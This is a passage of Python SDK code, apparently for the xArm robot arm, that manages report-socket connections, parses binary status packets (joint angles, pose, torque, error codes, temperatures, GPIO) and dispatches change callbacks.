self.arm_cmd.set_debug(self._debug)
self.set_timeout(self._cmd_timeout)
def disconnect(self):
try:
self._stream.close()
except:
pass
if self._stream_report:
try:
self._stream_report.close()
except:
pass
self._is_ready = False
try:
self._stream.join()
except:
pass
if self._stream_report:
try:
self._stream_report.join()
except:
pass
self._report_connect_changed_callback(False, False)
with self._cond_pause:
self._cond_pause.notifyAll()
def set_timeout(self, timeout):
self._cmd_timeout = timeout
if self.arm_cmd is not None:
self._cmd_timeout = self.arm_cmd.set_timeout(self._cmd_timeout)
return self._cmd_timeout
# def _check_version(self):
# self._version = None
# self._robot_sn = None
# try:
# count = 2
# while not self._version and count:
# self.get_version()
# time.sleep(0.1)
# count -= 1
# if self._version and isinstance(self._version, str):
# pattern = re.compile(r'.*[vV](\d+)\.(\d+)\.(\d+)')
# m = re.match(pattern, self._version)
# if m:
# self._major_version_number, self._minor_version_number, self._revision_version_number = map(int,
# m.groups())
# else:
# version_date = '-'.join(self._version.split('-')[-3:])
# self._is_old_protocol = compare_time('2019-02-01', version_date)
# if self._is_old_protocol:
# self._major_version_number = 0
# self._minor_version_number = 0
# self._revision_version_number = 1
# else:
# self._major_version_number = 0
# self._minor_version_number = 1
# self._revision_version_number = 0
# if self._check_robot_sn:
# count = 2
# while not self._robot_sn and count and self.warn_code == 0:
# self.get_robot_sn()
# self.get_err_warn_code()
# if not self._robot_sn and self.warn_code == 0 and count:
# time.sleep(0.1)
# count -= 1
# if self.warn_code != 0:
# self.clean_warn()
# print('is_old_protocol: {}'.format(self._is_old_protocol))
# print('version_number: {}.{}.{}'.format(self._major_version_number, self._minor_version_number,
# self._revision_version_number))
# except Exception as e:
# print('compare_time: {}, {}'.format(self._version, e))
def _connect_report(self):
if self._enable_report:
if self._stream_report:
try:
self._stream_report.close()
except:
pass
time.sleep(2)
if self._report_type == 'real':
self.__connect_report_real()
elif self._report_type == 'normal':
self.__connect_report_normal()
else:
self.__connect_report_rich()
def __connect_report_normal(self):
if self._stream_type == 'socket':
self._stream_report = SocketPort(self._port, XCONF.SocketConf.TCP_REPORT_NORM_PORT,
buffer_size=XCONF.SocketConf.TCP_REPORT_NORMAL_BUF_SIZE
if not self._is_old_protocol else 87)
def __connect_report_rich(self):
if self._stream_type == 'socket':
self._stream_report = SocketPort(self._port, XCONF.SocketConf.TCP_REPORT_RICH_PORT,
buffer_size=1024 if not self._is_old_protocol else 187)
def __connect_report_real(self):
if self._stream_type == 'socket':
self._stream_report = SocketPort(self._port, XCONF.SocketConf.TCP_REPORT_REAL_PORT,
buffer_size=1024 if not self._is_old_protocol else 87)
def _report_connect_changed_callback(self, main_connected=None, report_connected=None):
if self.REPORT_CONNECT_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_CONNECT_CHANGED_ID]:
try:
callback({
'connected': self._stream and self._stream.connected if main_connected is None else main_connected,
'reported': self._stream_report and self._stream_report.connected if report_connected is None else report_connected,
})
except Exception as e:
logger.error('connect changed callback: {}'.format(e))
def _report_state_changed_callback(self):
if self._ignore_state:
return
if self.REPORT_STATE_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_STATE_CHANGED_ID]:
try:
callback({
'state': self._state
})
except Exception as e:
logger.error('state changed callback: {}'.format(e))
def _report_mode_changed_callback(self):
if self.REPORT_MODE_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_MODE_CHANGED_ID]:
try:
callback({
'mode': self._mode
})
except Exception as e:
logger.error('mode changed callback: {}'.format(e))
def _report_mtable_mtbrake_changed_callback(self):
if self.REPORT_MTABLE_MTBRAKE_CHANGED_ID in self._report_callbacks.keys():
mtable = [bool(i) for i in self._arm_motor_enable_states]
mtbrake = [bool(i) for i in self._arm_motor_brake_states]
for callback in self._report_callbacks[self.REPORT_MTABLE_MTBRAKE_CHANGED_ID]:
try:
callback({
'mtable': mtable.copy(),
'mtbrake': mtbrake.copy()
})
except Exception as e:
logger.error('mtable/mtbrake changed callback: {}'.format(e))
def _report_error_warn_changed_callback(self):
if self._ignore_error:
return
if self.REPORT_ERROR_WARN_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_ERROR_WARN_CHANGED_ID]:
try:
callback({
'warn_code': self._warn_code,
'error_code': self._error_code,
})
except Exception as e:
logger.error('error warn changed callback: {}'.format(e))
def _report_cmdnum_changed_callback(self):
if self.REPORT_CMDNUM_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_CMDNUM_CHANGED_ID]:
try:
callback({
'cmdnum': self._cmd_num,
})
except Exception as e:
logger.error('cmdnum changed callback: {}'.format(e))
def _report_temperature_changed_callback(self):
if self.REPORT_TEMPERATURE_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_TEMPERATURE_CHANGED_ID]:
try:
callback({
'temperatures': self.temperatures,
})
except Exception as e:
logger.error('temperature changed callback: {}'.format(e))
def _report_count_changed_callback(self):
if self.REPORT_COUNT_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_COUNT_CHANGED_ID]:
try:
callback({
'count': self._count
})
except Exception as e:
logger.error('count changed callback: {}'.format(e))
def _report_location_callback(self):
if self.REPORT_LOCATION_ID in self._report_callbacks.keys():
for item in self._report_callbacks[self.REPORT_LOCATION_ID]:
callback = item['callback']
ret = {}
if item['cartesian']:
ret['cartesian'] = self.position.copy()
if item['joints']:
ret['joints'] = self.angles.copy()
try:
callback(ret)
except Exception as e:
logger.error('location callback: {}'.format(e))
def _report_callback(self):
if self.REPORT_ID in self._report_callbacks.keys():
for item in self._report_callbacks[self.REPORT_ID]:
callback = item['callback']
ret = {}
if item['cartesian']:
ret['cartesian'] = self.position.copy()
if item['joints']:
ret['joints'] = self.angles.copy()
if item['error_code']:
ret['error_code'] = self._error_code
if item['warn_code']:
ret['warn_code'] = self._warn_code
if item['state']:
ret['state'] = self._state
if item['mtable']:
mtable = [bool(i) for i in self._arm_motor_enable_states]
ret['mtable'] = mtable.copy()
if item['mtbrake']:
mtbrake = [bool(i) for i in self._arm_motor_brake_states]
ret['mtbrake'] = mtbrake.copy()
if item['cmdnum']:
ret['cmdnum'] = self._cmd_num
try:
callback(ret)
except Exception as e:
logger.error('report callback: {}'.format(e))
def _report_thread_handle_old(self):
def __handle_report_normal(rx_data):
# print('length:', convert.bytes_to_u32(rx_data[0:4]))
state, mtbrake, mtable, error_code, warn_code = rx_data[4:9]
angles = convert.bytes_to_fp32s(rx_data[9:7 * 4 + 9], 7)
pose = convert.bytes_to_fp32s(rx_data[37:6 * 4 + 37], 6)
cmd_num = convert.bytes_to_u16(rx_data[61:63])
pose_offset = convert.bytes_to_fp32s(rx_data[63:6 * 4 + 63], 6)
if error_code != self._error_code or warn_code != self._warn_code:
if error_code != self._error_code:
self._error_code = error_code
if self._error_code != 0:
pretty_print('Error, code: {}'.format(self._error_code), color='red')
else:
pretty_print('Error had clean', color='blue')
if warn_code != self._warn_code:
self._warn_code = warn_code
if self._warn_code != 0:
pretty_print('Warn, code: {}'.format(self._warn_code), color='yellow')
else:
pretty_print('Warnning had clean', color='blue')
self._report_error_warn_changed_callback()
logger.info('OnReport -> err={}, warn={}, state={}, cmdnum={}, mtbrake={}, mtable={}'.format(
error_code, warn_code, state, cmd_num, mtbrake, mtable
))
elif not self._only_report_err_warn_changed:
self._report_error_warn_changed_callback()
if cmd_num != self._cmd_num:
self._cmd_num = cmd_num
self._report_cmdnum_changed_callback()
if state != self._state:
self._state = state
self._report_state_changed_callback()
mtbrake = [mtbrake & 0x01, mtbrake >> 1 & 0x01, mtbrake >> 2 & 0x01, mtbrake >> 3 & 0x01,
mtbrake >> 4 & 0x01, mtbrake >> 5 & 0x01, mtbrake >> 6 & 0x01, mtbrake >> 7 & 0x01]
mtable = [mtable & 0x01, mtable >> 1 & 0x01, mtable >> 2 & 0x01, mtable >> 3 & 0x01,
mtable >> 4 & 0x01, mtable >> 5 & 0x01, mtable >> 6 & 0x01, mtable >> 7 & 0x01]
if mtbrake != self._arm_motor_brake_states or mtable != self._arm_motor_enable_states:
self._arm_motor_enable_states = mtable
self._arm_motor_brake_states = mtbrake
self._report_mtable_mtbrake_changed_callback()
if not self._is_first_report:
if state in [4, 5] or not all([bool(item[0] & item[1]) for item in zip(mtbrake, mtable)][:self.axis]):
# if self._is_ready:
# pretty_print('[report], xArm is not ready to move', color='red')
self._is_ready = False
else:
# if not self._is_ready:
# pretty_print('[report], xArm is ready to move', color='green')
self._is_ready = True
else:
self._is_ready = False
self._is_first_report = False
if not self._is_ready:
self._sleep_finish_time = 0
if error_code in [1, 10, 11, 12, 13, 14, 15, 16, 17, 19, 28]:
self.modbus_baud = -1
self.robotiq_is_activated = False
self.gripper_is_enabled = False
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = 0
self.gripper_is_enabled = False
self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
self._error_code = error_code
self._warn_code = warn_code
self.arm_cmd.has_err_warn = error_code != 0 or warn_code != 0
_state = self._state
self._state = state
if _state == 3 and self.state != 3:
with self._cond_pause:
self._cond_pause.notifyAll()
self._cmd_num = cmd_num
self._arm_motor_brake_states = mtbrake
self._arm_motor_enable_states = mtable
update_time = time.time()
self._last_update_cmdnum_time = update_time
self._last_update_state_time = update_time
self._last_update_err_time = update_time
for i in range(len(pose)):
if i < 3:
pose[i] = float('{:.3f}'.format(pose[i]))
# pose[i] = float('{:.3f}'.format(pose[i][0]))
else:
pose[i] = float('{:.6f}'.format(pose[i]))
# pose[i] = float('{:.6f}'.format(pose[i][0]))
for i in range(len(angles)):
angles[i] = float('{:.6f}'.format(angles[i]))
# angles[i] = float('{:.6f}'.format(angles[i][0]))
for i in range(len(pose_offset)):
if i < 3:
pose_offset[i] = float('{:.3f}'.format(pose_offset[i]))
# pose_offset[i] = float('{:.3f}'.format(pose_offset[i][0]))
else:
pose_offset[i] = float('{:.6f}'.format(pose_offset[i]))
# pose_offset[i] = float('{:.6f}'.format(pose_offset[i][0]))
if math.inf not in pose and -math.inf not in pose and not (10 <= self._error_code <= 17):
self._position = pose
if math.inf not in angles and -math.inf not in angles and not (10 <= self._error_code <= 17):
self._angles = angles
if math.inf not in pose_offset and -math.inf not in pose_offset and not (10 <= self._error_code <= 17):
self._position_offset = pose_offset
self._report_location_callback()
self._report_callback()
if not self._is_sync and self._error_code != 0 and self._state not in [4, 5]:
self._sync()
self._is_sync = True
def __handle_report_rich(rx_data):
report_time = time.time()
interval = report_time - self._last_report_time
self._max_report_interval = max(self._max_report_interval, interval)
self._last_report_time = report_time
__handle_report_normal(rx_data)
(self._arm_type,
arm_axis,
self._arm_master_id,
self._arm_slave_id,
self._arm_motor_tid,
self._arm_motor_fid) = rx_data[87:93]
if 7 >= arm_axis >= 5:
self._arm_axis = arm_axis
if self._arm_type == 5:
self._arm_axis = 5
elif self._arm_type == 6:
self._arm_axis = 6
elif self._arm_type == 3:
self._arm_axis = 7
ver_msg = rx_data[93:122]
# self._version = str(ver_msg, 'utf-8')
trs_msg = convert.bytes_to_fp32s(rx_data[123:143], 5)
# trs_msg = [i[0] for i in trs_msg]
(self._tcp_jerk,
self._min_tcp_acc,
self._max_tcp_acc,
self._min_tcp_speed,
self._max_tcp_speed) = trs_msg
# print('tcp_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._tcp_jerk, self._min_tcp_acc, self._max_tcp_acc, self._min_tcp_speed, self._max_tcp_speed
# ))
p2p_msg = convert.bytes_to_fp32s(rx_data[143:163], 5)
# p2p_msg = [i[0] for i in p2p_msg]
(self._joint_jerk,
self._min_joint_acc,
self._max_joint_acc,
self._min_joint_speed,
self._max_joint_speed) = p2p_msg
# print('joint_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._joint_jerk, self._min_joint_acc, self._max_joint_acc,
# self._min_joint_speed, self._max_joint_speed
# ))
rot_msg = convert.bytes_to_fp32s(rx_data[163:171], 2)
# rot_msg = [i[0] for i in rot_msg]
self._rot_jerk, self._max_rot_acc = rot_msg
# print('rot_jerk: {}, mac_acc: {}'.format(self._rot_jerk, self._max_rot_acc))
sv3_msg = convert.bytes_to_u16s(rx_data[171:187], 8)
self._first_report_over = True
main_socket_connected = self._stream and self._stream.connected
report_socket_connected = self._stream_report and self._stream_report.connected
while self._stream and self._stream.connected:
try:
if not self._stream_report or not self._stream_report.connected:
self.get_err_warn_code()
if report_socket_connected:
report_socket_connected = False
self._report_connect_changed_callback(main_socket_connected, report_socket_connected)
self._connect_report()
continue
if not report_socket_connected:
report_socket_connected = True
self._report_connect_changed_callback(main_socket_connected, report_socket_connected)
rx_data = self._stream_report.read()
if rx_data != -1 and len(rx_data) >= 87:
if len(rx_data) == 87:
__handle_report_normal(rx_data)
elif len(rx_data) >= 187:
__handle_report_rich(rx_data)
except Exception as e:
logger.error(e)
time.sleep(0.001)
self.disconnect()
self._report_connect_changed_callback(False, False)
def _report_thread_handle(self):
def __handle_report_real(rx_data):
state, mode = rx_data[4] & 0x0F, rx_data[4] >> 4
cmd_num = convert.bytes_to_u16(rx_data[5:7])
angles = convert.bytes_to_fp32s(rx_data[7:7 * 4 + 7], 7)
pose = convert.bytes_to_fp32s(rx_data[35:6 * 4 + 35], 6)
torque = convert.bytes_to_fp32s(rx_data[59:7 * 4 + 59], 7)
if cmd_num != self._cmd_num:
self._cmd_num = cmd_num
self._report_cmdnum_changed_callback()
if state != self._state:
self._state = state
self._report_state_changed_callback()
if state in [4, 5]:
self._is_ready = False
else:
self._is_ready = True
if mode != self._mode:
self._mode = mode
self._report_mode_changed_callback()
for i in range(len(pose)):
if i < 3:
pose[i] = float('{:.3f}'.format(pose[i]))
# pose[i] = float('{:.3f}'.format(pose[i][0]))
else:
pose[i] = float('{:.6f}'.format(pose[i]))
# pose[i] = float('{:.6f}'.format(pose[i][0]))
for i in range(len(angles)):
angles[i] = float('{:.6f}'.format(angles[i]))
# angles[i] = float('{:.6f}'.format(angles[i][0]))
if math.inf not in pose and -math.inf not in pose and not (10 <= self._error_code <= 17):
self._position = pose
if math.inf not in angles and -math.inf not in angles and not (10 <= self._error_code <= 17):
self._angles = angles
self._joints_torque = torque
self._report_location_callback()
self._report_callback()
if not self._is_sync and self._state not in [4, 5]:
self._sync()
self._is_sync = True
def __handle_report_normal(rx_data):
# print('length:', convert.bytes_to_u32(rx_data[0:4]), len(rx_data))
state, mode = rx_data[4] & 0x0F, rx_data[4] >> 4
# if state != self._state or mode != self._mode:
# print('mode: {}, state={}, time={}'.format(mode, state, time.time()))
cmd_num = convert.bytes_to_u16(rx_data[5:7])
angles = convert.bytes_to_fp32s(rx_data[7:7 * 4 + 7], 7)
pose = convert.bytes_to_fp32s(rx_data[35:6 * 4 + 35], 6)
torque = convert.bytes_to_fp32s(rx_data[59:7 * 4 + 59], 7)
mtbrake, mtable, error_code, warn_code = rx_data[87:91]
pose_offset = convert.bytes_to_fp32s(rx_data[91:6 * 4 + 91], 6)
tcp_load = convert.bytes_to_fp32s(rx_data[115:4 * 4 + 115], 4)
collis_sens, teach_sens = rx_data[131:133]
# if (collis_sens not in list(range(6)) or teach_sens not in list(range(6))) \
# and ((error_code != 0 and error_code not in controller_error_keys) or (warn_code != 0 and warn_code not in controller_warn_keys)):
# self._stream_report.close()
# logger.warn('ReportDataException: data={}'.format(rx_data))
# return
length = convert.bytes_to_u32(rx_data[0:4])
data_len = len(rx_data)
if (length != data_len and (length != 233 or data_len != 245)) or collis_sens not in list(range(6)) or teach_sens not in list(range(6)) \
or mode not in list(range(12)) or state not in list(range(10)):
self._stream_report.close()
logger.warn('ReportDataException: length={}, data_len={}, '
'state={}, mode={}, collis_sens={}, teach_sens={}, '
'error_code={}, warn_code={}'.format(
length, data_len,
state, mode, collis_sens, teach_sens, error_code, warn_code
))
return
self._gravity_direction = convert.bytes_to_fp32s(rx_data[133:3*4 + 133], 3)
if error_code in [1, 10, 11, 12, 13, 14, 15, 16, 17, 19, 28]:
self.modbus_baud = -1
self.robotiq_is_activated = False
self.gripper_is_enabled = False
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = -1
self.gripper_speed = -1
self.gripper_version_numbers = [-1, -1, -1]
# print('torque: {}'.format(torque))
# print('tcp_load: {}'.format(tcp_load))
# print('collis_sens: {}, teach_sens: {}'.format(collis_sens, teach_sens))
if error_code != self._error_code or warn_code != self._warn_code:
if error_code != self._error_code:
self._error_code = error_code
if self._error_code != 0:
pretty_print('ControllerError, code: {}'.format(self._error_code), color='red')
else:
pretty_print('ControllerError had clean', color='blue')
if warn_code != self._warn_code:
self._warn_code = warn_code
if self._warn_code != 0:
pretty_print('ControllerWarning, code: {}'.format(self._warn_code), color='yellow')
else:
pretty_print('ControllerWarning had clean', color='blue')
self._report_error_warn_changed_callback()
logger.info('OnReport -> err={}, warn={}, state={}, cmdnum={}, mtbrake={}, mtable={}, mode={}'.format(
error_code, warn_code, state, cmd_num, mtbrake, mtable, mode
))
elif not self._only_report_err_warn_changed:
self._report_error_warn_changed_callback()
if cmd_num != self._cmd_num:
self._cmd_num = cmd_num
self._report_cmdnum_changed_callback()
if state != self._state:
self._state = state
self._report_state_changed_callback()
if mode != self._mode:
self._mode = mode
self._report_mode_changed_callback()
mtbrake = [mtbrake & 0x01, mtbrake >> 1 & 0x01, mtbrake >> 2 & 0x01, mtbrake >> 3 & 0x01,
mtbrake >> 4 & 0x01, mtbrake >> 5 & 0x01, mtbrake >> 6 & 0x01, mtbrake >> 7 & 0x01]
mtable = [mtable & 0x01, mtable >> 1 & 0x01, mtable >> 2 & 0x01, mtable >> 3 & 0x01,
mtable >> 4 & 0x01, mtable >> 5 & 0x01, mtable >> 6 & 0x01, mtable >> 7 & 0x01]
if mtbrake != self._arm_motor_brake_states or mtable != self._arm_motor_enable_states:
self._arm_motor_enable_states = mtable
self._arm_motor_brake_states = mtbrake
self._report_mtable_mtbrake_changed_callback()
if not self._is_first_report:
if state in [4, 5] or not all([bool(item[0] & item[1]) for item in zip(mtbrake, mtable)][:self.axis]):
# if self._is_ready:
# pretty_print('[report], xArm is not ready to move', color='red')
self._is_ready = False
else:
# if not self._is_ready:
# pretty_print('[report], xArm is ready to move', color='green')
self._is_ready = True
else:
self._is_ready = False
self._is_first_report = False
if not self._is_ready:
self._sleep_finish_time = 0
self._error_code = error_code
self._warn_code = warn_code
self.arm_cmd.has_err_warn = error_code != 0 or warn_code != 0
_state = self._state
self._state = state
if _state == 3 and self.state != 3:
with self._cond_pause:
self._cond_pause.notifyAll()
self._mode = mode
self._cmd_num = cmd_num
update_time = time.time()
self._last_update_cmdnum_time = update_time
self._last_update_state_time = update_time
self._last_update_err_time = update_time
self._arm_motor_brake_states = mtbrake
self._arm_motor_enable_states = mtable
self._joints_torque = torque
if compare_version(self.version_number, (0, 2, 0)):
self._tcp_load = [tcp_load[0], [i for i in tcp_load[1:]]]
else:
self._tcp_load = [tcp_load[0], [i * 1000 for i in tcp_load[1:]]]
self._collision_sensitivity = collis_sens
self._teach_sensitivity = teach_sens
for i in range(len(pose)):
if i < 3:
pose[i] = float('{:.3f}'.format(pose[i]))
# pose[i] = float('{:.3f}'.format(pose[i][0]))
else:
pose[i] = float('{:.6f}'.format(pose[i]))
# pose[i] = float('{:.6f}'.format(pose[i][0]))
for i in range(len(angles)):
angles[i] = float('{:.6f}'.format(angles[i]))
# angles[i] = float('{:.6f}'.format(angles[i][0]))
for i in range(len(pose_offset)):
if i < 3:
pose_offset[i] = float('{:.3f}'.format(pose_offset[i]))
# pose_offset[i] = float('{:.3f}'.format(pose_offset[i][0]))
else:
pose_offset[i] = float('{:.6f}'.format(pose_offset[i]))
# pose_offset[i] = float('{:.6f}'.format(pose_offset[i][0]))
if math.inf not in pose and -math.inf not in pose and not (10 <= self._error_code <= 17):
self._position = pose
if math.inf not in angles and -math.inf not in angles and not (10 <= self._error_code <= 17):
self._angles = angles
if math.inf not in pose_offset and -math.inf not in pose_offset and not (10 <= self._error_code <= 17):
self._position_offset = pose_offset
self._report_location_callback()
self._report_callback()
if not self._is_sync and self._error_code != 0 and self._state not in [4, 5]:
self._sync()
self._is_sync = True
def __handle_report_rich(rx_data):
report_time = time.time()
interval = report_time - self._last_report_time
self._max_report_interval = max(self._max_report_interval, interval)
self._last_report_time = report_time
# print('interval={}, max_interval={}'.format(interval, self._max_report_interval))
__handle_report_normal(rx_data)
(self._arm_type,
arm_axis,
self._arm_master_id,
self._arm_slave_id,
self._arm_motor_tid,
self._arm_motor_fid) = rx_data[145:151]
if 7 >= arm_axis >= 5:
self._arm_axis = arm_axis
# self._version = str(rx_data[151:180], 'utf-8')
trs_msg = convert.bytes_to_fp32s(rx_data[181:201], 5)
# trs_msg = [i[0] for i in trs_msg]
(self._tcp_jerk,
self._min_tcp_acc,
self._max_tcp_acc,
self._min_tcp_speed,
self._max_tcp_speed) = trs_msg
# print('tcp_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._tcp_jerk, self._min_tcp_acc, self._max_tcp_acc, self._min_tcp_speed, self._max_tcp_speed
# ))
p2p_msg = convert.bytes_to_fp32s(rx_data[201:221], 5)
# p2p_msg = [i[0] for i in p2p_msg]
(self._joint_jerk,
self._min_joint_acc,
self._max_joint_acc,
self._min_joint_speed,
self._max_joint_speed) = p2p_msg
# print('joint_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._joint_jerk, self._min_joint_acc, self._max_joint_acc,
# self._min_joint_speed, self._max_joint_speed
# ))
rot_msg = convert.bytes_to_fp32s(rx_data[221:229], 2)
# rot_msg = [i[0] for i in rot_msg]
self._rot_jerk, self._max_rot_acc = rot_msg
# print('rot_jerk: {}, mac_acc: {}'.format(self._rot_jerk, self._max_rot_acc))
servo_codes = [val for val in rx_data[229:245]]
for i in range(self.axis):
if self._servo_codes[i][0] != servo_codes[i * 2] or self._servo_codes[i][1] != servo_codes[i * 2 + 1]:
print('servo_error_code, servo_id={}, status={}, code={}'.format(i + 1, servo_codes[i * 2], servo_codes[i * 2 + 1]))
self._servo_codes[i][0] = servo_codes[i * 2]
self._servo_codes[i][1] = servo_codes[i * 2 + 1]
self._first_report_over = True
# length = convert.bytes_to_u32(rx_data[0:4])
length = len(rx_data)
if length >= 252:
temperatures = list(map(int, rx_data[245:252]))
if temperatures != self.temperatures:
self._temperatures = temperatures
self._report_temperature_changed_callback()
if length >= 284:
speeds = convert.bytes_to_fp32s(rx_data[252:8 * 4 + 252], 8)
self._realtime_tcp_speed = speeds[0]
self._realtime_joint_speeds = speeds[1:]
# print(speeds[0], speeds[1:])
if length >= 288:
count = convert.bytes_to_u32(rx_data[284:288])
# print(count, rx_data[284:288])
if self._count != -1 and count != self._count:
self._count = count
self._report_count_changed_callback()
self._count = count
if length >= 312:
world_offset = convert.bytes_to_fp32s(rx_data[288:6 * 4 + 288], 6)
for i in range(len(world_offset)):
if i < 3:
world_offset[i] = float('{:.3f}'.format(world_offset[i]))
else:
world_offset[i] = float('{:.6f}'.format(world_offset[i]))
if math.inf not in world_offset and -math.inf not in world_offset and not (10 <= self._error_code <= 17):
self._world_offset = world_offset
if length >= 314:
self._cgpio_reset_enable, self._tgpio_reset_enable = rx_data[312:314]
if length >= 417:
self._is_simulation_robot = bool(rx_data[314])
self._is_collision_detection, self._collision_tool_type = rx_data[315:317]
self._collision_tool_params = convert.bytes_to_fp32s(rx_data[317:341], 6)
voltages = convert.bytes_to_u16s(rx_data[341:355], 7)
voltages = list(map(lambda x: x / 100, voltages))
self._voltages = voltages
currents = convert.bytes_to_fp32s(rx_data[355:383], 7)
self._currents = currents
cgpio_states = []
cgpio_states.extend(rx_data[383:385])
cgpio_states.extend(convert.bytes_to_u16s(rx_data[385:401], 8))
cgpio_states[6:10] = list(map(lambda x: x / 4095.0 * 10.0, cgpio_states[6:10]))
cgpio_states.append(list(map(int, rx_data[401:409])))
cgpio_states.append(list(map(int, rx_data[409:417])))
if length >= 433:
cgpio_states[-2].extend(list(map(int, rx_data[417:425])))
cgpio_states[-1].extend(list(map(int, rx_data[425:433])))
self._cgpio_states = cgpio_states
main_socket_connected = self._stream and self._stream.connected
report_socket_connected = self._stream_report and self._stream_report.connected
buffer = b''
size = 0
while self._stream and self._stream.connected:
try:
if not self._stream_report or not self._stream_report.connected:
self.get_err_warn_code()
if report_socket_connected:
report_socket_connected = False
self._report_connect_changed_callback(main_socket_connected, report_socket_connected)
self._connect_report()
buffer = b''
size = 0
continue
if not report_socket_connected:
report_socket_connected = True
self._report_connect_changed_callback(main_socket_connected, report_socket_connected)
recv_data = self._stream_report.read(1)
if recv_data != -1:
buffer += recv_data
if len(buffer) < 4:
continue
if size == 0:
size = convert.bytes_to_u32(buffer[0:4])
if len(buffer) < size:
continue
if self._report_type == 'real':
data = buffer[:size]
buffer = buffer[size:]
__handle_report_real(data)
elif size >= XCONF.SocketConf.TCP_REPORT_NORMAL_BUF_SIZE:
if size >= XCONF.SocketConf.TCP_REPORT_RICH_BUF_SIZE:
if size == 233 and len(buffer) == 245:
data = buffer[:245]
buffer = buffer[245:]
else:
data = buffer[:size]
buffer = buffer[size:]
__handle_report_rich(data)
else:
data = buffer[:size]
buffer = buffer[size:]
__handle_report_normal(data)
else:
if self._stream and self._stream.connected:
code, err_warn = self.get_err_warn_code()
if code == -1 or code == 3:
break
if not self._stream or not self._stream.connected:
break
elif not self._stream_report or not self._stream_report.connected:
self._connect_report()
except Exception as e:
logger.error(e)
if self._stream and self._stream.connected:
code, err_warn = self.get_err_warn_code()
if code == -1 or code == 3:
break
if not self._stream or not self._stream.connected:
break
if not self._stream_report or not self._stream_report.connected:
self._connect_report()
time.sleep(0.001)
self.disconnect()
self._report_connect_changed_callback(False, False)
def _auto_get_report_thread(self):
logger.debug('get report thread start')
while self.connected:
try:
cmd_num = self._cmd_num
state = self._state
error_code = self._error_code
warn_code = self._warn_code
self.get_cmdnum()
time.sleep(0.01)
self.get_state()
time.sleep(0.01)
self.get_err_warn_code()
time.sleep(0.01)
self.get_servo_angle()
time.sleep(0.01)
self.get_position()
if state == 3 and self.state != 3:
with self._cond_pause:
self._cond_pause.notifyAll()
if cmd_num != self._cmd_num:
self._report_cmdnum_changed_callback()
if state != self._state:
self._report_state_changed_callback()
if state in [4, 5]:
# if self._is_ready:
# pretty_print('[report], xArm is not ready to move', color='red')
self._sleep_finish_time = 0
self._is_ready = False
else:
# if not self._is_ready:
# pretty_print('[report], xArm is ready to move', color='green')
self._is_ready = True
if error_code != self._error_code or warn_code != self._warn_code:
self._report_error_warn_changed_callback()
elif not self._only_report_err_warn_changed and (self._error_code != 0 or self._warn_code != 0):
self._report_error_warn_changed_callback()
self._report_location_callback()
self._report_callback()
if self._cmd_num >= self._max_cmd_num:
time.sleep(1)
self._first_report_over = True
time.sleep(0.1)
except:
pass
self._report_connect_changed_callback(False, False)
logger.debug('get report thread stopped')
def _sync_tcp(self, index=None):
if not self._stream_report or not self._stream_report.connected:
self.get_position()
self.get_servo_angle()
self._last_angles = self._angles.copy()
if index is None:
self._last_position = self._position.copy()
elif isinstance(index, int) and 0 <= index < 6:
self._last_position[index] = self._position[index]
# print('=============sync_tcp: index={}'.format(index))
def _sync_joints(self, index=None):
if not self._stream_report or not self._stream_report.connected:
self.get_position()
self.get_servo_angle()
self._last_position = self._position.copy()
if index is None:
self._last_angles = self._angles.copy()
elif isinstance(index, int) and 0 <= index < 7:
self._last_angles[index] = self._angles[index]
# print('=============sync_joint: index={}'.format(index))
def _sync(self):
if not self._stream_report or not self._stream_report.connected:
self.get_position()
self.get_servo_angle()
self._last_position = self._position.copy()
self._last_angles = self._angles.copy()
# print('=============sync_all')
def _set_params(self, **kwargs):
is_radian = kwargs.get('is_radian', self._default_is_radian)
if 'X' in kwargs and isinstance(kwargs['X'], (int, float)):
self._last_position[0] = kwargs.get('X')
if 'Y' in kwargs and isinstance(kwargs['Y'], (int, float)):
self._last_position[1] = kwargs.get('Y')
if 'Z' in kwargs and isinstance(kwargs['Z'], (int, float)):
self._last_position[2] = kwargs.get('Z')
if 'A' in kwargs and isinstance(kwargs['A'], (int, float)):
self._last_position[3] = kwargs.get('A') if is_radian else math.radians(kwargs.get('A'))
if 'B' in kwargs and isinstance(kwargs['B'], (int, float)):
self._last_position[4] = kwargs.get('B') if is_radian else math.radians(kwargs.get('B'))
if 'C' in kwargs and isinstance(kwargs['C'], (int, float)):
self._last_position[5] = kwargs.get('C') if is_radian else math.radians(kwargs.get('C'))
# if 'R' in kwargs and isinstance(kwargs['R'], (int, float)):
# self._last_position[6] = kwargs.get('R')
if 'I' in kwargs and isinstance(kwargs['I'], (int, float)):
self._last_angles[0] = kwargs.get('I') if is_radian else math.radians(kwargs.get('I'))
if 'J' in kwargs and isinstance(kwargs['J'], (int, float)):
self._last_angles[1] = kwargs.get('J') if is_radian else math.radians(kwargs.get('J'))
if 'K' in kwargs and isinstance(kwargs['K'], (int, float)):
self._last_angles[2] = kwargs.get('K') if is_radian else math.radians(kwargs.get('K'))
if 'L' in kwargs and isinstance(kwargs['L'], (int, float)):
self._last_angles[3] = kwargs.get('L') if is_radian else math.radians(kwargs.get('L'))
if 'M' in kwargs and isinstance(kwargs['M'], (int, float)):
self._last_angles[4] = kwargs.get('M') if is_radian else math.radians(kwargs.get('M'))
if 'N' in kwargs and isinstance(kwargs['N'], (int, float)):
self._last_angles[5] = kwargs.get('N') if is_radian else math.radians(kwargs.get('N'))
if 'O' in kwargs and isinstance(kwargs['O'], (int, float)):
self._last_angles[6] = kwargs.get('O') if is_radian else math.radians(kwargs.get('O'))
